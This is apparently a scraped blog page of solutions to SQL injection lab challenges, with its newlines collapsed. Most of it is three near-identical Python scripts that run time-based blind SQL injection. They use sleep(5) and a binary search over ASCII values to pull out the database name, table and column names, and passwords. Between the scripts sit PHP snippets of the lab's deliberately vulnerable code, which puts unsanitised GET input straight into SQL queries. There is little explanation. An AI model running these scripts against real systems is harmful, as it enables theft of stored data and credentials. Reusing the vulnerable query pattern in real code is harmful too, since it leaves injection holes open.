import requestsimport timeurl = ""flag = ''  def payload(i, j):    startTime=time.time()    # 数据库名字    sql = "1'and if(ascii(substr(database(),%d,1))>%d,sleep(5),-1)-- "%(i,j)    # 表名    #sql = "id = if(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)    # 列名    #sql = "id = if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)    # 查询flag    #sql = "id = if(ascii(substr((select password from users),%d,1))>%d,sleep(5),-1)%%23"%(i,j)     try:        r = requests.get(url % sql, timeout=10)    except:        pass    # print (r.url)    if time.time()-startTime>5:        res = 1    else:        res = 0    return res  def exp():    global flag    for i in range(1, 10000):        low = 31        high = 127        while low <= high:            mid = (low + high) // 2            res = payload(i, mid)            if res:                low = mid + 1            else:                high = mid - 1        f = int((low + high + 1)) // 2        if (f == 127 or f == 31):            break        # print (f)        flag += chr(f)        print(flag)  exp()



if(isset($_GET['id']))      {           $id=$_GET['id'];                //logging the connection parameters to a file for analysis.         $fp=fopen('result.txt','a');            fwrite($fp,'ID:'.$id."\n");         fclose($fp);                            //update the counter in database            next_tryy();                        //Display attempts on screen.           $tryyy = view_attempts();           echo "You have made : ". $tryyy ." of $times attempts";         echo "<br><br><br>\n";                              //Reset the Database if you exceed allowed attempts.            if($tryyy >= ($times+1))            {               setcookie('challenge', ' ', time() - 3600000);              echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";               echo "Redirecting you to challenge page..........\n";               header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );                echo "<br>\n";          }                                           // Querry DB to get the correct output          $sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";         $result=mysql_query($sql);          $row = mysql_fetch_array($result);          if($row)            {               echo '<font color= "#00FFFF">';                 $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");               $pass = array_reverse($unames);             echo 'Your Login name : '. $unames[$row['id']];             echo "<br>";                echo 'Your Password : ' .$pass[$row['id']];             echo "</font>";         }           else            {               echo '<font color= "#FFFF00">';//               print_r(mysql_error());             echo "</font>";             }       }


import requestsimport timeurl = ""flag = ''  def payload(i, j):    startTime=time.time()    # 数据库名字    sql = "1))and if(ascii(substr(database(),%d,1))>%d,sleep(5),-1)-- "%(i,j)    # 表名    #sql = "id = if(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)    # 列名    #sql = "id = if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)    # 查询flag    #sql = "id = if(ascii(substr((select password from users),%d,1))>%d,sleep(5),-1)%%23"%(i,j)     try:        r = requests.get(url % sql, timeout=10)    except:        pass    # print (r.url)    if time.time()-startTime>5:        res = 1    else:        res = 0    return res  def exp():    global flag    for i in range(1, 10000):        low = 31        high = 127        while low <= high:            mid = (low + high) // 2            res = payload(i, mid)            if res:                low = mid + 1            else:                high = mid - 1        f = int((low + high + 1)) // 2        if (f == 127 or f == 31):            break        # print (f)        flag += chr(f)        print(flag)  exp()



if(isset($_GET['id']))      {           $id=$_GET['id'];                //logging the connection parameters to a file for analysis.         $fp=fopen('result.txt','a');            fwrite($fp,'ID:'.$id."\n");         fclose($fp);                            //update the counter in database            next_tryy();                        //Display attempts on screen.           $tryyy = view_attempts();           echo "You have made : ". $tryyy ." of $times attempts";         echo "<br><br><br>\n";                              //Reset the Database if you exceed allowed attempts.            if($tryyy >= ($times+1))            {               setcookie('challenge', ' ', time() - 3600000);              echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";               echo "Redirecting you to challenge page..........\n";               header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );                echo "<br>\n";          }                               $id = '"'.$id.'"';          // Querry DB to get the correct output          $sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";           $result=mysql_query($sql);          $row = mysql_fetch_array($result);          if($row)            {               echo '<font color= "#00FFFF">';                 $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");               $pass = array_reverse($unames);             echo 'Your Login name : '. $unames[$row['id']];             echo "<br>";                echo 'Your Password : ' .$pass[$row['id']];             echo "</font>";         }           else            {               echo '<font color= "#FFFF00">';//               print_r(mysql_error());             echo "</font>";             }       }


import requestsimport timeurl = ""flag = ''  def payload(i, j):    startTime=time.time()    # 数据库名字    sql = "1\")and if(ascii(substr(database(),%d,1))>%d,sleep(5),-1)-- "%(i,j)    # 表名    #sql = "id = if(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)    # 列名    #sql = "id = if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)    # 查询flag    #sql = "id = if(ascii(substr((select password from users),%d,1))>%d,sleep(5),-1)%%23"%(i,j)     try:        r = requests.get(url % sql, timeout=10)    except:        pass    # print (r.url)    if time.time()-startTime>5:        res = 1    else:        res = 0    return res  def exp():    global flag    for i in range(1, 10000):        low = 31        high = 127        while low <= high:            mid = (low + high) // 2            res = payload(i, mid)            if res:                low = mid + 1            else:                high = mid - 1        f = int((low + high + 1)) // 2        if (f == 127 or f == 31):            break        # print (f)        flag += chr(f)        print(flag)  exp()



发送评论 编辑评论

 ̄﹃ ̄
∠( ᐛ 」∠)_
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
( ๑´•ω•) "(ㆆᴗㆆ)
Source: github.com/k4yt3x/flowerhd